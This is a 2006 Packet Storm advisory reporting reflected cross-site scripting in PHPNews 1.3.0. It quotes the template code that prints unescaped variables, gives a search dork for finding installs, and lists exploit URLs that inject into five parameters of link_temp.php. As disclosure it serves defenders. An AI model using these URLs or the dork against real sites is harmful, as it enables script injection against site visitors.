phpnews130-xss.txt

2006-12-06T00:00:00
ID PACKETSTORM:52740
Type packetstorm
Reporter Detefix
Modified 2006-12-06T00:00:00

Description

                                        
                                            `PHP Script: PHPNews 1.3.0  
Class: XSS  
Website: http://newsphp.sourceforge.net  
Found by: Detefix  
dork: inurl:phpnews  
  
-----  
  
- Vulnerable Code:  
  
<?php  
print<<<EOT  
<a href="$url?action=fullnews&showcomments=1&id=$id">$subject</a> by $username on $time<br />  
  
-----  
  
- Exploits:  
  
http://[target]/[path-to-PHPNews]/templates/link_temp.php?url=">[XSS]  
http://[target]/[path-to-PHPNews]/templates/link_temp.php?id=">[XSS]  
http://[target]/[path-to-PHPNews]/templates/link_temp.php?subject=[XSS]  
http://[target]/[path-to-PHPNews]/templates/link_temp.php?username=[XSS]  
http://[target]/[path-to-PHPNews]/templates/link_temp.php?time=[XSS]  
`